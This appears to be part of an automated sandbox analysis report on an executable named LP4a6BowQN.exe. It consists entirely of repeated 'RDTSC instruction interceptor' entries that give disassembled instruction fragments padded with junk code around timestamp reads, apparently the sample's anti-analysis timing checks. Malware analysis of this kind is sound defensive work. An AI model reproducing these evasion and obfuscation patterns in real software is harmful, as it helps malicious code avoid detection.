                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A98F5E second address: A98F7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FC8BCFEEF15h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A99123 second address: A99137 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC8BCD07020h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A99137 second address: A9913B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A9913B second address: A99145 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A99145 second address: A9914B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A9914B second address: A9914F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A99CD5 second address: A99CDA instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A9DA6D second address: A9DA71 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A9DA71 second address: A9DAA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC8BCFEEF19h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007FC8BCFEEF19h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A9D746 second address: A9D750 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FC8BCD07016h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: AA9639 second address: AA963F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: AA963F second address: AA9643 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: AA9643 second address: AA965C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC8BCFEEF0Bh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jc 00007FC8BCFEEF06h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: AA965C second address: AA9680 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FC8BCD07016h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jmp 00007FC8BCD07025h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: AA9680 second address: AA96A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 popad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jmp 00007FC8BCFEEF10h 0x00000012 js 00007FC8BCFEEF06h 0x00000018 popad 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: AADC85 second address: AADCA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC8BCD07028h 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: ABB834 second address: ABB849 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FC8BCFEEF06h 0x0000000a popad 0x0000000b jno 00007FC8BCFEEF0Ah 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: ABB849 second address: ABB862 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jng 00007FC8BCD07016h 0x00000009 jmp 00007FC8BCD0701Eh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: ACF0B2 second address: ACF0B8 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: ACF0B8 second address: ACF0DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 pushad 0x00000008 pushad 0x00000009 jmp 00007FC8BCD07029h 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: ACF0DE second address: ACF0EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 pop eax 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: ACF50B second address: ACF533 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC8BCD07022h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FC8BCD07022h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: ACF533 second address: ACF559 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FC8BCFEEF0Ah 0x00000008 push esi 0x00000009 pop esi 0x0000000a push esi 0x0000000b pop esi 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FC8BCFEEF16h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: ACF687 second address: ACF68D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: ACF68D second address: ACF693 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: ACFABB second address: ACFABF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: ACFABF second address: ACFAD9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC8BCFEEF0Bh 0x00000007 js 00007FC8BCFEEF06h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push esi 0x00000011 pop esi 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: ACFAD9 second address: ACFAE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FC8BCD07016h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: ACFAE4 second address: ACFAEB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: AD2A68 second address: AD2A6E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: AD2A6E second address: AD2A74 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: AD2A74 second address: AD2A78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: AD2D0D second address: AD2D11 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: AD2DEA second address: AD2DF8 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: AD2DF8 second address: AD2DFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: AD3085 second address: AD30AE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC8BCD0701Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ecx 0x0000000a push eax 0x0000000b jne 00007FC8BCD0702Ch 0x00000011 pushad 0x00000012 jmp 00007FC8BCD0701Eh 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: AD30AE second address: AD3106 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 nop 0x00000006 or dword ptr [ebp+122D2472h], edx 0x0000000c push dword ptr [ebp+122D1D9Dh] 0x00000012 push 00000000h 0x00000014 push ebp 0x00000015 call 00007FC8BCFEEF08h 0x0000001a pop ebp 0x0000001b mov dword ptr [esp+04h], ebp 0x0000001f add dword ptr [esp+04h], 00000014h 0x00000027 inc ebp 0x00000028 push ebp 0x00000029 ret 0x0000002a pop ebp 0x0000002b ret 0x0000002c pushad 0x0000002d call 00007FC8BCFEEF10h 0x00000032 mov bh, D6h 0x00000034 pop edx 0x00000035 jno 00007FC8BCFEEF0Ch 0x0000003b popad 0x0000003c push 9D613D65h 0x00000041 pushad 0x00000042 push eax 0x00000043 push eax 0x00000044 push edx 0x00000045 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: AD7D60 second address: AD7D72 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jo 00007FC8BCD0701Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: AD7D72 second address: AD7D79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: AD7D79 second address: AD7D80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: AD7D80 second address: AD7D8A instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FC8BCFEEF0Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 9EDFC4 second address: 9EDFC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 9EE191 second address: 9EE1AF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC8BCFEEF17h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 9EE37B second address: 9EE37F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 9EE37F second address: 9EE383 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 9EE383 second address: 9EE389 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AB02E1 second address: 4AB035D instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FC8BCFEEF0Bh 0x00000008 sub si, 9A2Eh 0x0000000d jmp 00007FC8BCFEEF19h 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 mov esi, 5CCE9CB7h 0x0000001a popad 0x0000001b push eax 0x0000001c pushad 0x0000001d jmp 00007FC8BCFEEF13h 0x00000022 pushfd 0x00000023 jmp 00007FC8BCFEEF18h 0x00000028 and ax, EA08h 0x0000002d jmp 00007FC8BCFEEF0Bh 0x00000032 popfd 0x00000033 popad 0x00000034 xchg eax, ebp 0x00000035 push eax 0x00000036 push edx 0x00000037 push eax 0x00000038 push edx 0x00000039 push eax 0x0000003a push edx 0x0000003b rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AB035D second address: 4AB0361 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AB0361 second address: 4AB037C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC8BCFEEF17h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AB037C second address: 4AB03B8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, ebx 0x00000005 pushfd 0x00000006 jmp 00007FC8BCD0701Bh 0x0000000b xor esi, 2F6E6FAEh 0x00000011 jmp 00007FC8BCD07029h 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a mov ebp, esp 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 popad 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AB03B8 second address: 4AB03BE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AB03BE second address: 4AB03DD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC8BCD07022h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov edx, dword ptr [ebp+0Ch] 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AB03DD second address: 4AB03E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AB03E1 second address: 4AB03E7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AB03E7 second address: 4AB03FC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov ecx, dword ptr [ebp+08h] 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov di, 0B2Ah 0x00000010 mov bx, AFF6h 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AB041F second address: 4AB0425 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AD0767 second address: 4AD076D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AD076D second address: 4AD0771 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AD0771 second address: 4AD078D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov ch, F8h 0x0000000e jmp 00007FC8BCFEEF0Dh 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AD078D second address: 4AD07C9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FC8BCD07027h 0x00000009 add si, 2E6Eh 0x0000000e jmp 00007FC8BCD07029h 0x00000013 popfd 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AD07C9 second address: 4AD07E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov ebp, esp 0x00000009 jmp 00007FC8BCFEEF0Ch 0x0000000e xchg eax, ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AD07E5 second address: 4AD07EB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AD07EB second address: 4AD07FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC8BCFEEF0Bh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AD07FA second address: 4AD0831 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007FC8BCD07021h 0x00000012 and esi, 71B276B6h 0x00000018 jmp 00007FC8BCD07021h 0x0000001d popfd 0x0000001e popad 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AD0831 second address: 4AD0848 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC8BCFEEF13h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AD0848 second address: 4AD08C8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ecx 0x00000009 pushad 0x0000000a mov bx, 22C6h 0x0000000e pushfd 0x0000000f jmp 00007FC8BCD07027h 0x00000014 sub ax, 914Eh 0x00000019 jmp 00007FC8BCD07029h 0x0000001e popfd 0x0000001f popad 0x00000020 xchg eax, esi 0x00000021 jmp 00007FC8BCD0701Eh 0x00000026 push eax 0x00000027 push eax 0x00000028 push edx 0x00000029 pushad 0x0000002a pushfd 0x0000002b jmp 00007FC8BCD0701Ch 0x00000030 jmp 00007FC8BCD07025h 0x00000035 popfd 0x00000036 movzx eax, di 0x00000039 popad 0x0000003a rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AD08C8 second address: 4AD08CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AD08CE second address: 4AD08D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AD08D2 second address: 4AD092B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, esi 0x00000009 pushad 0x0000000a mov eax, 731C0AEDh 0x0000000f jmp 00007FC8BCFEEF0Ah 0x00000014 popad 0x00000015 lea eax, dword ptr [ebp-04h] 0x00000018 pushad 0x00000019 call 00007FC8BCFEEF0Eh 0x0000001e mov dx, cx 0x00000021 pop esi 0x00000022 mov edi, 2B67C482h 0x00000027 popad 0x00000028 push ecx 0x00000029 jmp 00007FC8BCFEEF16h 0x0000002e mov dword ptr [esp], eax 0x00000031 pushad 0x00000032 movzx esi, dx 0x00000035 push eax 0x00000036 push edx 0x00000037 mov ax, bx 0x0000003a rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AD092B second address: 4AD092F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AD092F second address: 4AD0950 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push dword ptr [ebp+08h] 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FC8BCFEEF13h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AD0950 second address: 4AD096D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC8BCD07029h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AD096D second address: 4AD0973 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AD0973 second address: 4AD0977 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AD099A second address: 4AD099E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AD099E second address: 4AD09A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AD09A4 second address: 4AD09AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AD09AA second address: 4AD09AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AD0A3F second address: 4AD0A43 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AD0A43 second address: 4AD0A49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AD0A49 second address: 4AD0A78 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, eax 0x00000005 mov ax, 48EFh 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, esi 0x0000000e jmp 00007FC8BCFEEF12h 0x00000013 pop esi 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FC8BCFEEF0Ah 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AD0A78 second address: 4AD0A7C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AD0A7C second address: 4AD0A82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AD0A82 second address: 4AD0A88 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AD0A88 second address: 4AD0A8C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AD0A8C second address: 4AC01A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 leave 0x00000009 pushad 0x0000000a jmp 00007FC8BCD07022h 0x0000000f mov dx, cx 0x00000012 popad 0x00000013 retn 0004h 0x00000016 nop 0x00000017 cmp eax, 00000000h 0x0000001a setne al 0x0000001d jmp 00007FC8BCD07012h 0x0000001f xor ebx, ebx 0x00000021 test al, 01h 0x00000023 jne 00007FC8BCD07017h 0x00000025 sub esp, 04h 0x00000028 mov dword ptr [esp], 0000000Dh 0x0000002f call 00007FC8C0FB4795h 0x00000034 mov edi, edi 0x00000036 push eax 0x00000037 push edx 0x00000038 pushad 0x00000039 jmp 00007FC8BCD0701Dh 0x0000003e mov ax, 5267h 0x00000042 popad 0x00000043 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AC01A1 second address: 4AC01A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
